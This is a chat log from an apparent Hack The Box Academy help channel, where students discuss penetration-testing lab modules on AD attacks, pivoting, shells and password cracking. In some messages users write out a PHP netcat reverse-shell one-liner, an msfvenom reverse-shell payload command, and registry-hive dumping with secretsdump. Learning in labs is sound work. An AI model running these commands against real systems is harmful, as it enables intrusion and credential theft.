#modules
did you check the question in forum and here?
yeah
i found the solution, it is easy, it is just the enumeration i try to optimize
Most subdirs if the top level dir is writable are gonna be writable

Ah
and we are back to my question 😉
Also I think you can use smbmap with -c to do a command
If command fail >> no write
yeah there is some ways to do it since we did but i was asking if there was a tool who do it like smbmap with -r or -R
seems we need to go around the "problem"
it isnt a problem at first xD
i did with smbclient and -c like you said, and tried to write my file on a subdir
but that was weird there isnt an option for that in smbmap or smbclient
or i missed it
anyway thanks all for helping
and i meant i already solved it and i meant i search a tool that does it without scripting it because with -c you must script in bash to make it work
Lol
```
Command Execution:
Options for executing commands on the specified host
-x COMMAND Execute a command ex. 'ipconfig /all'
--mode CMDMODE Set the execution method, wmi or psexec, default wmi
```
how is that running responder smb relaying gives different hashes for just network-joined computer and domain-joined computer?
Local users and domain users are two different things.
so it is worth to run responder on every compromised machine in AD, or just difference is big between machine in domain, and out of domain?
A non-domain machine isn't going to have the same inter-network communication that would trip responder for domain accounts.
Really, you should just use responder always in any windows situation lol
cool, thanks
or inveigh, if you prefer
Has anyone done Working with IDS/IPS, specifically Snort Rule Development? I can't seem to get the correct syntax for the answer.
don't forget the ; at the end
nope
Is it the full keyword?
Hello to all. I am a little stuck on the Blind XSS activity regarding the PHP listener I am using to listen back to the connection. The first version of this script was to gather credentials but now I need to gather info from multiple input fields such as URL image for avatar, username, password, etc. While I have to change the location to listen to the new page of the exercise, do I have to add additional parameters for isset() and fputs to gather $_GET[' e.g. URL Image parameter name '] to get these values also?
Anyone know why I can't send images to this discord?
read #welcome
something is definitely wrong because i tried with the next module (windows) and the passwords i get are not the answer
You should delete that screenshot, as it has spoilers. It looks like you got the password just fine.
i'm definitely not getting it 🤣 😅
i tried with three different answer boxes and they dont accept them
Can anyone help me with this PHP listener for multiple inputs?
what module and section are you having issue with?
try with either /tls-seclevel:0 or /timeout:80000 or both
@vital adder LLMNR/NBT-NS Poisoning - from Linux from Active Directory enumeration
Someone deleted my msg with all the details 😅
most likely because it contains a spoiler
also what's the issue? this section straightforward
I understand but when i input the answer they dont work, I can send images in private if needed
which module and section are you on?
If I recall the question says the account name starts with a b submit his full username
I am on XSS vulnerability in the Session Hijacking and trying to implement a blind XSS with a PHP listener
I have the username
oh so you got the cred but it didn't get accept as the answer? and sure shoot me a dm with the cred
alright, Mrtom to the rescue 😉
Will do thanks
hint everything you need for that is in the examples and the main thing is you have to host ||2|| file
walkthrough and write isn't allowed for that module
I dont need to change the PHP script to get more than username and password inputs?
@vital adder ive been having some trouble w a metasploit module, do you mind seeing if im on the right track if i send you the scans and the exploit im using?
but will if you need some help feel free to shoot me a dm but i'm kinda full right now so you may have to wait a bit 🤣
sure
sure and same as the others feel free to shoot me a dm if you need help
just to double check you are on the Session Hijacking section of the XSS module right? if so then yep
I keep getting the following error when trying to use chisel on the pivot host in the module "Pivoting, Tunneling, AND Port Forwarding" section "SOCKS5 Tunneling with Chisel". I used a different version of chisel as stated to do in the section when you receive an error.
```
ubuntu@WEB01:~/chisel-1.7.3$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
```
if you are using the arm version then just use the amd version
Thank you!
i was rewriting and figured out i had changed an option that messed everything up, so its all working now :))))
Hey everyone, can someone help me with the module Footprinting - Lab Hard. I’ve managed to get the private key for the user, changed permissions for the ssh key and tried to log in but it won’t establish a connection .. I’ve tried many things (switching to root user etc.) doesn’t seem to work , does anyone know what to do?
Hello im in module AD Enumeration & Attacks - Skills Assessment Part II in question 11 (Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.), please could somebody help me ?
for someone to be able to help you, you kinda have to say what you need help with 🤣
Im trying to log in DC01 but credentials dont work!!
but i have helped enough people to kinda guess what you are having issue with and hint go back to question 9
hint you can't
also it's an AD attack not a PrivEsc so why is logging in your first and (maybe) only choice?
so you have the cred, key and user but you still can't login?
mmmm
like i said it isn't a PrivEsc and the hint i gave: go back to "question" 9 (not the answer)
use .\powerview.ps1
or -s i think
i load it
im trying to solve this f**cking module but i cant
i use this Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Right…
shoot me a dm with key that you have and if that's wrong i'll send you the one that work for me
if you need a other hint then you have a user that's in the ||DA|| pwning the DC should be straight forward
Did you get the badge now?
It should be possible to get the badge now.
I am the 0.00%
me too
the girl doesn't like it (too fast)
Hey guys me and my friend gonna make an automatic bot in krunker.io that claim free kr on specific map so if anyone wanna join DM me also we gonna split the kr we make
hello everyone
the live engagement is kicking my butt
in the shells & payload section
don't chat in here much so i can't even upload pics
i used this payload to get a reverse shell msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.11 LPORT=8080 -f war -o revshell.war
but when i deploy it and activate my listener nc -lvnp 8080 i get nothing
Do you also click the link after deploying?
hello everyone i have a little question what is the difference between wmiexec and psexec, where do i have to use them and what ports do they use?
i did click on the link which opened up another page but i got no error
If you’re anything like me, you discovered Impacket, either through a course, Ippsec, or your own research, and you look at the scripts…
I'm a little bit stuck on Password Attacks -Hard assessment. I've got as far as getting the vhd and running it through john and gotten a password, but when I try to mount it (following this https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 mentioned previously in this chat), then when I try to open the 'Device' and enter the password it says "Password Incorrect".
Any Idea where I went wrong?
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
read #welcome and #rules after that use /verify at #bot-commands and after you verify your account you can send screenshot
also pls ask better question some thing like what's the issue, what did you try and what didn't work
ooohh this is what i need thanks
this channel is for HTB academy so don't share sh!t like this or you will get the 👢 from one of the mod
if you have some issue following that let me know
Hi im stuck at Introduction to bash scripting and im kinda confused what i should try next could someone help me?
ok verified now
hi there, i dm you my decoded shellcodes
revshell upload
what target are you on and did you try to run the shell?
i went to webpage
how do i run the shell ? i thought once i hit deploy that would be running the shell
the issue is you are using the wrong ip
use 172.16.1.5 instead
will do, how would i know to use that ip ?
it's the ip of the given box 🤣
i mean the internal ip of the foothold machine
thanks for your help kind squirrel
lol i will need more help in this section
Thanks for the assist, I got it open
can anybody help how to mount vhd file in linux
That foothold box is not connected to the internet afaik
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
hint that exploit is somewhere in the foothold box
im doing the vulnerability assessment module. With openvas what the vulnerabilities are called is not appearing
roger that, i'm looking now
i get a long as string like 1.3.6.1.4.1.25623.1.0.900600, not what the vuln is called
buffer-overflow modules are now tier 0?
which makes it so I cant answer the questions of what vuln its describing
Yes, I had issues mounting the vhd too but that link worked for me
i believe i found it
Thanks for all the assistance with Password Attacks. Just finished the module
NVM to my issue, I literally changed nothing and it fixed itself randomly
how do i drop that payload into msfconsole? i'm having issues doing so
By listening on the same ip and port that you set for the payload
could you give me an example of the command ?
if you mean import the exploit module into metasploit then i don't have anything on the top of my head right now so google is your best friend also the key is after importing the exploit run reload_all before you can use it
I have a question friends...
If i pay for an annual vip+ of $200plus
Then am i able to get access to pro lab or not ?
Pro labs are a separate subscription
pro labs aren't even from the academy
first if you are new here read #welcome and #rules after that use /verify at #bot-commands and are you in the academy channel so if you mean the Silver Annual then nope the academy doesn't have anything to do with the main platform and if you mean the VIP+ on HTB then still nope but now "all" prolab is $49
academy just covers the modules and with silver sub I think u have 1 attempt for the exam
Mood
and in the main platform there is a sub for the machines and other one for the pro labs
1 voucher
Which is still the 2 attempts
How do I 'impersonate' a user with 'sqlcmd'?
put it in /home/htb-student/.msf4/modules/
I believe attacking common services shows how
Mssqlclient and sqlcmd are relatively the same thing
1 question
BOF modules weren't tier 0 before right?
I was blind and I just saw I can buy them for 10 cubes
@fathom pendant Right ok thx I'll reread some things. Couldn't use mssqlclient because it was lagging too much on the pwnbox, now doing sqlcmd from rdp
Ye but I believe the section goes over checking impersonate privs and how to
So it should be good
I think these modules have always been Tier 0.
i did that and did a msfupdate in msfconsole
waiting for it to load and hopefully payload is available now
Just completed the final 'hard' lab of the Attacking Common Services skills assessment. If anyone needs help on that module or any before it go ahead and ask me and I'll try to give you a hint.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 171.16.1.5 8443 >/tmp/f"); ?> i uploaded this command and i'm listening on port 8443 and got no connection any idea why ?
Try accessing the url of the .php file you uploaded @high reef
got this error
not .aspx, you wrote your shell in php originally right? Should be .php
unless php is not running on that server
Woops youll have to upload an aspx shell @high reef My mistake I should have just told you that. Normally you don't see php AND aspx running on the same server.
The source of the issue is the expired DomainControllerAuthentication and KerberosAuthentication certificates on the domain controller. They expired on March 30, 2023. Another fun exercise is rooting the DC, updating the certs, then proceeding with the PetitPotam exploit. I've posted the issue in #858470491676737536 but it will require someone go update the image.
Very nice to share this info, I will definitely try it
i have a shell but i can't travel any where
do you have a reverse shell i can use nc with ?
thanks
Hello i have a question about a Anatomy of a Shell the question is "Which two shell languages did we experiment with in this section? (Format: shellname&shellname)" so my answer is ||powershell&bash|| but i still get an incorrect answer is it because im typing it in the wrong format.
did you try it the other way around?
Lol it worked 😄 Thanks
For future reference, you can't cd anywhere from inside a simple webshell because it's just executing single commands from the directory that it is placed in.
~~Question regarding Footprinting Lab - Medium ~~
Resolved!
evil-winrm doesnt use RDP
Oh. That makes sense. I'm dumb as hell, hahaha. This is exactly why I should coffee before trying to use my brain.
happens
Ended up using Remmina but curious if anyone would suggest any other RDP tools?
INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.
I did the next things: PowerShell -> Get-Process | Where-Object { $_.Name -like "vm" }
Results: vmtoolsd (which is wrong) and vm3dservice (which is also wrong)
Anyone a hint what i did do wrong?
Imo remmina is the best, especially the scaling options
Thanks for the feedback.
madf0x beat you to it 😛
Thank you though!
remmina, xfreerdp, vinagre
Hey all, I have a question about the Attacking Common Services - Easy section.|| I got a set of creds and was able to find the upload portal on the site, as well as its path on the host, but am not sure how to leverage this. I know that uploading a shell is the way to go, but I can't find where the file goes. || Any help is appreciated
Found it. Forgot .exe
The application you're attacking is open source, the file structure is well known
I'll open a PR to increase the stats decimal places
you were part of the 0.0001%
@proud pine you can post this as Linkedin status now
Top 0.0001% 
I mean, he wouldn't be lying
INTRODUCTION TO WINDOWS COMMAND LINE - skill assessment.
Task 10 (last one) What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
All the info i got from the log files are incorrect. Should i connect to another machine (DC) first?
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack?
can anyone help me with this Ques :
Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
Ive tried nslookup and dig tools
cant find the FQDN on the output...am I missing something?
The question is posed in a somewhat confusing manner. You are looking for the FQDN of the NameServer
Just wondering what I am possibly doing wrong. I'm trying to do the quiz for Attacking Common Services - FTP but I just cant see the FTP port. I'm using sudo nmap -p- -sV -sC <IP> but the only open services that I get back are ssh, DNS and SMB
when I scan specifically for FTP like its stated in the section -p 21 I can see 21/tcp closed ftp
Hey guys I'm a newbie in the academy and don't understand if I were to finish a certain amount of modules am I going to have a chance to be recruited in the HTB organization?
Earlier they were quite clear about connecting to the DC, now i guess i use the same creds as earlier with the user?
@nimble fractal i am using "sudo responder -I tun0" for the responder, anything wrong here?
You can take the same creds as you have worked out for this task
Thanks, found it.
Try restarting the box and giving it a minute or two before scanning, could just be an error with spawning it
Anyone done Introduction to C#? I'm having a problem getting VS Code to import the library from the Assessment.
Stuck with the same task 🙈
Its my final question 😄
Were you able to include the DLL in the Libraries section?
module : attacking sql databases
i have logged in with the given creds, trying to do hash stealing but getting this errors. any help is appreciated
I'll take care of it tomorrow.
Yeah, but I did it on my windows machine.
My secret weapon
hahaha
still borked
are you sure 10.10.14.255 is actually your tun0 ip address?
With VS Code or with Visual Studio Community?
@trail leaf yep
VS Code.
try to Scan all Ports 😉
That can't be right. X.X.X.255 is a broadcast address
@nimble fractal
Broadcast in this case is 10.10.15.255
10.10.14.1 - 10.10.15.254 are Hosts
and you dont have perms for xp_subdirs
This is only true if the subnet mask is a /24.
@thorn urchin found it thx for the help
np
I wish that gave a different result
You should have another port showing up there. Slightly higher
Restart the lab. One port is still missing
22 it’s the best port to go though my man
Its not.
Ye it is for a server
The challenge is for FTP.
yep! /bonk
I don't know why you think the module could be cursed. If you tell what does not work, you will surely get help
Spammer got auto banned I think
currently struggling to even enumerate users 
Take a close look at the NMAP scan.
Identify a port with the NMAP, and then use one of the tools that's discussed in the earlier chapters to enumerate users.
tried smtp-user-enum, also hydra for password spraying on ftp and rdp
How am I supposed to get the hashes from a NTDS.dit file I have? I tried to cat it and got the binaries xd
Are you using the provided user.list file?
I thought as much
yeah
Added domain?
yeah
What commands are you trying? (obfuscate them)
did you try updating the certs ? I am currently on it but am facing an RPC error when trying to enroll for new certs. did you manage to do it ?
i am, otherwise i wouldnt even see it
can i dm u?
you must provide path to every file (NTDS SYSTEM, SAM)
You need the SYSTEM and SAM from the registry
Sure.
if you read French : https://rebrec.github.io/rebsecnotes-public/_Techniques/Windows/Dump de credentials/Dump de la SAM/#sam
else basically you first need to gather those 3 files by running the following on the compromised host:
```
reg save hklm\sam sam.save
reg save hklm\system system.save
reg save hklm\security security.save
```
then you download the 3 "save" files on your attack box and then run
```
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
Various notes from CTF experience
Technically, they only need the SYSTEM, as they've got the NTDS.dit
umm nevermind, just bumped on secretsdump and didn't read properly
😄
🙂
ok for some reason i found an user
Ah oke thx
It works
thanks
Because the connection in question wasnt being broadcasted across the network
ONLY being sent to that one box
also a ton of spoilers, should delete your message now
Nice, definitely above and beyond the scope the lab intends for ya, but imo thats where some of the best learning is done
even if in this case the motivation was to fix the lab
If we have a student HTB academy plan, the silver plan really only gives us the free voucher, yeah? pretty much the only thing you'd get from going to student to silver or am I missing something
thanks will try with certify, this is weird that the enrollment agent is not able to get a new cert and certify can lol. I am wondering how certify gets the certs, is it using the web endpoint instead of RPC calls ?
4th time's the charm🍀 . FTP finally showed up
I can help u with certipy if u have any doubt
from windows ?
https://github.com/dirkjanm/PKINITtools u can use this to craft tickets and get the nthash with the cert
the goal is to install new certificates on the domain controller, even if this may be feasible with certipy, it would be more complex I guess
oh mb
I thought u wanted to get the certificate
🙂
not create and new one
The certs on the DC that allow that to work expired so we are discussing the process of updating the certs so that can be used as shown in the module.
oh okay
which module is it?
I would like to learn about that
AD Enumeration and Attacks - Bleeding Edge Vulnerabilities section.
they updated the module?
I don't remember doing anything about certificates in that module
@fathom pendant I'm stuck on the Footprinting Lab - Easy......... Can someone help assist me in this module? Once I log into the ftp server with the creds provided, I can't seem to progress from there.
You didn't have to do that part (PetitPotam exploit) to answer the questions, it was optional.
it doesnt. theyre going beyond to solve why a part of it is broken
Id love an ADCS module though
oh okay
I kindly advise to not spoil the exercises, additionally to not push students into rabbitholes
Not spoilers when the whole exercise says "do what we did in the section"
I dont see how its spoiling an exercise. Its an optional section
I'm talking in general
I guess ¯_(ツ)_/¯
Wheee!
guyys
congrats
I've seen students falling into rabbitholes just because they have read x, y and z, without considering
From different users
2 more questions to go and I'll have finished every (current) module! 😄
Rabbit holes have the best knowledge gains
thats impressive
That's possible, but only if they can dig themselves out of the rabbit hole
@acoustic owl be fuming
i have a problem , how could i shut down redeemer machine in hack the box, i cannot connect with the machine but i can stop that machine
Not quite, especially when you don't know what you are doing
please
More like "Oh hey, someone I can ask for help!" 😄
they too have been aiming to clear every academy module
sorry
This is the channel for academy modules. Try #boxes
How was it ?
Relatively easy up until the Skill Assessment, where it suddenly was a bit more complicated. But nothing too difficult. Hardest part was getting VS Codium to co-operate and get the wordlist out of the library.
and youll gain access
they have labs ? For this
I've been a little ahead for awhile. But I had this week off, so I was finishing off the last 5 modules. Just need to do Game Hacking.
Some basic questions for some of the modules, with a couple of labs. Final lab is importing a dll, and then using it to enumerate against a HTTP server to grab a flag.
Nice! I've been waiting for this. Have been having some trouble locating quality zero to hero Offensive C#.
I've finally done it! Taken a year, but I've done it!!
Now to do some prolabs and boxes, lol
i only need to answer this one question to be done with shells and payloads
i'm stuck here, i go to website and find the clue to download the 50064.rb file
i upload it to msfconsole but i get this error message
i set the rhosts=172.16.1.12 set lhost=172.16.1.5 set username admin set password admin123!@#
i saw a clue on the forum about vhost its not needed to be set, but what would it be set to ?
insane bro
keep the grind
I am still at 48/83
Hey all, I'm having an issue in the Password attacks “Passwd, Shadow & Opasswd” module.|| I got the passwd and shadow file, unshadowed it, but now I'm running the command "hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked" and getting no results. Both the password.list file and mut_password.list files exhausted the list, and rockyou.txt is going to take three hours. Is there anything else I can do, or do I just need to bite the bullet?|| Advice here or DMs would be appreciated.
Hi so about the Learning Process module, I've revisited it and was going through some of my notes and saw that "The Learning Pyramid" has some controversy behind it, this being more specifically directed at sections: Learning Efficiency and Learning Type.
||The controversy being that NTL Institute the initial Research org that published "the learning pyramid" is currently unable to prove any of its work due to quote "While we believe it to be accurate, we no longer have nor can we find the original research that supports the numbers." <- This was taken from The paper published by Kare Letrud "A Rebuttal of NTL Institute's Learning Pyramid".||
Anyone find any similar info in their research? Also I've tried searching for the original papers on "The Learning Pyramid" and have yet to stumble on anything.
Idk, I loosely follow the ultra learning principles. Never learned this Learning Pyramid
I wouldnt worry about it too much
either you have the passion and spark of curiosity that drives you to learning in this field or you dont
I can side with that, learning to discern info was part of the module's advice 😛
Set the vhost
hey guys. I can't find julio.txt https://academy.hackthebox.com/module/147/section/1657 Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
any hints? as to what I might be doing wrong? the last person who got stuck here didn't get an answer in the channel
got it
say what dayum! You done every single module?!
Yep! And that’s the plan!
thats a helluva achievement though congrats every single module!
wrapped in spoiler and harmless as it is. Id delete before a mod reads it
You figure this one out yet? I am stuck here also. I got all the subdomains, running dig to check records, and not finding anything. I see something with flags in records, but that is not it.
Can anyone help with the Footprinting Lab -Easy?
you guys all doing the attacking enterprise networks module at the very end blind? doable blind ?
Mostly blind
one little part im not sure how I would have done blind without simply knowing the trick of it beforehand
added to my notes ofc
That one part was totally not fair lol
ahh - that towards the end or start of it?
without giving anything away
youll find out
hehe alright indeed i will
Im still stuck on AD enumeration skills assessment question8 i must be overthinking this gahhh
What is your question?
#1 or #2?
#2
that was the one that got me for few minutes as well but then I read the hint
Im sitting as system on MSQL01 and tried all the things i can think of to get myself admin on MS01
ohh it was the next one that had me stumped not that one
just read the hint on that one, go back to the basics
something talked about in this module basics or previous modules?
the hint on the next one helps too, this one "Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?"
embrace the suffering, thats where you learn the most 😄 - go back to the basics of the module, the hint is a give away, good luck
I would also say, just start from scratch, do a full start to finish attack. I did both the AD exercises blind, only read the questions towards the end of #2 for the hint. So I had already mapped out the entire domain, users, groups, privs etc. If you're just answering the questions, maybe you haven't done full enumeration yet so do that
ahhh okay
@lyric bolt🍞
ive spent all day looking at different resources, determining which module I should begin with
its... exciting to learn about all these different things
hopefully I can stay consistent in my learning
I dont know exactly what I want to achieve with htb
but ill do it regardless
Start with the infosec foundation path, it paves the groundwork for a lot of things
Im on the your interests screen on the account creation part
once I hit it, i realized I dont exactly know uhh
what interests me
Honestly: this isn't important
alright
I also know a tiny bit of python if that adds any value
trying to get better in that regard
Todays lab was the Tom cat server.. I couldn’t figure it out. But eventually got it! I go out to party and Tom cat looking right at me
There's probably a few python courses and such but eh for the most part, unless you're creating your own tool, you rarely need to code your own things
Can anyone tell me the suggestion for undetectable payload and for autoinstallation
?
No
What module is this for
It's a personal qs
For my project
Then that's just a skill issue. But it is wholly unrelated to this channel
Good bye
Good
🙄
Go fuck off now, if you don't know how to read rules
U too 
I at least know what the rules are and what the purpose of this channel is
@obsidian crag don't want to destroy the fun but keep spamming unrelated stuff to this channel like that you will get the 👢from one of the mod
Okk🙄
Correct, just ask your questions in the appropriate place
COMMAND INJECTIONS - Advanced Command Obfuscation: How do I bypass the blacklist filter of the -n 1 part in the command "tail -n 1"?
Potentially url encoding?
hey
I'm new to this whole thing and am trying to sign up for the HTB thing, and I don't understand what exactly everything means in the "your interests" section means
could someone give me the rundown?
Ur right, I did miss something from the section
I mean it's kinda self explanatory, things that interest you
It's overall, not actually important
just user data stuff ¯_(ツ)_/¯
Yes, however, when I say I'm new to this whole thing, I mean I'm brand spanking new to this entire field, I don't understand what the words mean
Then you don't need to really select anything or just use google
Development Security Operations
Just honestly Google them or select arbitrarily
It really doesn't matter
I'm just going to choose all the ones that say Penetration testing because I'm childish and that sounds funny
ok, cool
Congratulations 🎉
Because Wolfiej has completed all modules?
No, I am happy for him and admire this achievement.
I was just joshing around
what is function of -z
So Im having some problems with the introduction modules.
inlanefreight.com is not responding
yet the site works just fine
it checks if the passed argument is empty. ex:
```bash
#!/bin/bash
if [[ -z $1 ]]; then
    echo "No argument provided"
else
    echo "argument: $1"
fi
```
example;
if i run this
```bash
./program
```
returns 'no argument provided'
```bash
./program hello
```
returns ' argument: hello'
can anyone help me out here on to what's going on?
also, the emulators are slow too
@coarse escarp is this for the questions section Obtain a session cookie through a valid login, and then use the cookie with cURL to search for the flag through a JSON POST request to '/search.php'?
@coarse escarp You need to start the target and then connect to the given ip to access the website.
but what is the benefit of double square brackets, because when i use square brackets the code works
I see now
i need to spawn it in first
yea it would work, double is for enhanced conditional testing, ex. && and ||
if you would pass 2 arguments in single [ <x> ] it would return too many arguments + the normal result for example, in double [[ <x> ]] it would just return the normal result
maybe fullscreen mode would be useful
ok so now I'm getting a syntax error around the port number
you should specify the port without <> around it
same for the ip
remove the < >
did that now I gotta add a new port number lol
no such file or directory...
@coarse escarp can you show the full command you have now?
you still have < and > at the ip address, remove those
but then why did the instructions say <IP_address>:<Portnumber>
that's just a placeholder
I'm semi new but come from a coding background
in an object based code that is used as a housing syntax
so I'm a little confused but will remember not to use those
oh wait..
I didn't add parameters
- you have a space before the port number it seems like, there should be no space after the :
- not -x but -X
got it
what is the meaning of this?
wait... that's the same pic
hold on
so it's saying I need a valid cookie but I copy and pasted the most recent one
with the correct port number
a condition is a set parameter that the code will run in
an if else command is an example of a condition
If the amount is above 50 dollars deny access Else allow transaction
and a variable can be anything you set value to
it's a container of value
so for java a variable looks like {Bank amount = $~}
a for loop is a repeated action until a condition is met
and it doesn't exactly need to be a repeated action either
it's a way of making the code flow
it's a different kind of jump condition
for each task is complete go back and repeat until a clause is met
a bit rusty so I had to double check some of my work
great...
because of my internet I lost my box
What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)
please someone answer
i have no paid subs.
if you mean the pwnbox then
Please note, free users are only able to spawn one Pwnbox instance per day. The Pwnbox instance has a lifetime of 120 minutes. Internet access is limited to our own targets, and GitHub. This limit can be lifted by making a purchase on Academy.
yeah ik just annoyed is all
What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)
I completed 83 modules, but I still have no the Hardware Hacking badge lol, it's missing, lol
Im sure they will fix it on Monday 🙂
so in the regular htb I'm having trouble with a build bash script
I'm literally a few commands away from completing this box
but it's not finding a supported release
good day friends, how to solve this?
Is there a file users.txt?
If yes, does your user have the right to overwrite this file?
Meow is a box from Starting Point. Try to get help there.
#starting-point
If you have no access, then read and follow #welcome
i see, you are in /opt, right?
Your user has no write permissions there.
Change to your user directory
oh i get it 😅 thanks a lot 😊
Doing HTTPs/TLS Attacks:Skills Assessment and have been stuck for a couple of days, from what i understand it's oracle padding attack and error message is "Decryption failed" not " Padding failed", therefore the decryption of htb-user cookie succeed, but getting admin user cookie seems to be missing an encryption and i tried adding base64 + hex {vice versa} encoding to admin cookie but no results
any help is well appreciated!!
Have you decoded the token?
I posted the issue there
would you mind seeing what's wrong?
I can help you with most of the modules in the Academy, but I don't have notes from Starting Point.
That's why I told you to ask your question in the right channel. There will be people there who can help you.
after i got what is supposedly the admin cookie and tried to redeem it /token but I get " Decryption Error. Invalid Token! "
ok
Send me a DM with the command you used.
and i have viewed the responses in Burp, and most of the pages and buttons are static except for /admin and /token, but i didn't see any token laying around for any user
ok
I am having trouble with this question('+ 5 What is the password history size of the domain? (How many passwords remembered.') from the section of this module(https://academy.hackthebox.com/module/22/section/290) and I think I have to look for the domainDNS with the search filter of the ldapsearch-ad command:
"python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 10.129.42.188 -d inlanefreight -u james.cross -p Academy_Student! -search-filter "domainDNS"
The command below didn't return the results I wanted. What else could I add to this command ?
Hey i'm on pivoting module in the SocksOverRDP section. I've uploaded the zip into the windows machine and extracted the files, but once i try to "load" the .dll file this error occurs
The file is detected as a virus and is deleted just after the command
Module: File Upload Attacks
Section: Final Assessement
I'm stuck, cant make any progress on this - can someone give me nudge? Open for a DM?
Deactivate Real Time Protection on this Machine first
Thanks, it worked
Try to get the PHP source code.
Module : Network Enumeration with NMAP
Section : Saving the result
Using VPN
Question : is this a networking issue or do I have to change my nmap parameters to do the requested scan ?
Thx
This is expected as you're doing a verbose output, it's telling you "hey this port we're trying ain't responding"
And because you're doing -p- it's checking all ports
Module: Network Enumeration with NMAP
Section: Firewall and IDS/IPS Evasion - Easy Lab
Question: i cant seem to find OS type everything i try gives me back "No exact OS matches for host"
Only thing i found was this but the answer is not Linux
Also i found some write up that says i should use this but its not working (nmap --script smb-os-discovery 10.129.2.8)
How do i send pictures discord is not letting me
Well when you run Nmap it shows that a web service is running
You can reasonably assume the os based off that (it's the distro)
Verify your main htb account, the instructions are in #welcome
Visit the webpage
Or perform it specifically targeting the web server
thx for your response.
I did --vv when I noticed it was taking such a long time. -p- is for full scan as requested in the exercise.
Why does it take such a long time for the scanning ? Do I need to work on my nmap parameters ? Is my nmap command correct for this exercise ? ...
There's 65535 ports, and depending on various factors, it can take a small bit of time to confirm if a port is closed or not.
Thx rat for answering. I do understand that the number of scanned ports can make nmap take a long time... but... i'm using HTBvm and I am surprised that this simple nmap command takes such a long time... It takes longer than my HTBVM life time 🤔 This is why i'm asking myself if I use the right parameters for this exercise ...
Try the scan with -sT instead
You're doing a syn scan meaning it's going to keep trying until max retries are met
Iirc you can hard set --max-retries
It's telling you that it's bumping up the retries because it's failing
I'm working through the Live Engagement of the Shells & Payloads modules and am on Task 3.
|| I'm attempting to use EternalBlue to exploit the machine, but it's failing. The server allows aspx uploads and I am able to access PowerShell with antak. I'm in a mental block where I'm not sure what I require to move forward. ||
Are you setting the LHOST to the right internal ip

@fathom pendant that was my initial fault 😄
Love that you asked this. The results from ifconfig give me several results and I'm conditioned to use tun0 (not present).
I have prefixes docker, ens, and lo. My intuition says docker.
try other 😄
but you are in the good path
@misty mural Have you achieve the reverse?
No, the process fails after the exploit is executed on the target.
Wrong Server
The final output is "Triggering free of corrupted buffer" prior to failure.
task 3 you mean the host3?
Correct.
what service are you trying to exploit?
SMB via port 445.
windows/smb/ms17_010_eternalblue
@proud pine @fathom pendant thx for your help. I answered the module final question by doing a -Pn scan... but... I'm still wondering why -p- option takes so long time. I tested it on my own VB and same thing.... very long ....
sometimes some modules are better than others,depending on the host...
@rustic sage using -p- and not using any other flag as -min-rate or -T4 , and if you are using normal three hand shake tcp imagine for 65535 ports...
XDDDD
I appreciate you helping me win the war against my own mind. XD
.
@misty mural 😄 no problem, imagine my face when I was taking the wrong IP in the first host... Same feeling XD
I understand. I thought I had to make more searches on nmap parameters to answer the module's final question using -p- . The problem for this module is : if the spawnmachine has his top TCP open port out of the range of the default values for -Pn, it will be impossible to find it due to the fact that -p- is too long to run. Because when asking to do a full TCP scan... aren't we supposed to scan all port (-p-) ....? Anyway ... I'm now going to next module ... 😀 Thx for helping @misty mural @torn steppe @fathom pendant @proud pine
I am having a surprisingly hard time with Attacking Common services - FTP, I am stuck on the 2nd question where I need to enter the username that I have found.
I used Hydra and the 2 lists that was provided in this module and I got a successful response. But when I submit the username as an answer it does not work. And I can't connect to the ssh service as required in the last question with the username and password that hydra found.
hydra -L 'users.list' -P 'pws.list' ftp://IP -s PORT
[PORT][ftp] host: IP login: j___ password: 3_______
.....
ssh j____@IP
j____@IP: Permission denied (publickey).
I don't know but, maybe the mistake is that are you trying to login via ssh with a ftp credentials??
I dont reach this module yet but maybe the credentials are different between services and applications
The questions for that section
Yeah, this one is a bit weird. I tried to find the port with a -p- nmap scan but it didnt show up until the 4th reset
what port is running ssh service?
22, the standard one
I need some help with server side attack module, skill assessment. It will be great help if someone could drop some solutions.
how to upload screenshots of the assessment ??
hello all
AD Enumeration & Attacks - Skills Assessment Part II
- 1 Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
i was able to get a meterpreter session and ran "getsystem" and found the answer to the question
but am not able to do hashdump to solve the next question
- 1 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
did i approach the first question in a wrong way ? please give me hints i feel like am lost
**Firewall and IDS/IPS Evasion - Hard Lab**
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I found the port but not sure how to get the flag.
try connecting to the service, or using one of the nmap flags
Connecting is the way to go
@fathom pendant how to get a role of HTB community contributor
#📣-announcements message no idea when i will get my
by contributing to the community
ohk
"Credential Hunting in Linux" - Password Attacks
I tried mutating the password without success when doing hydra. Any tips please? 🥺
try lowercase
If you live here, so to speak, then this role comes automatically 🤪
I added l (all to lowercase) to the custom.rule and tried, didnt work 😢
Username 😶
haha awesome thank you!
yo for the people who are used to use ligolo
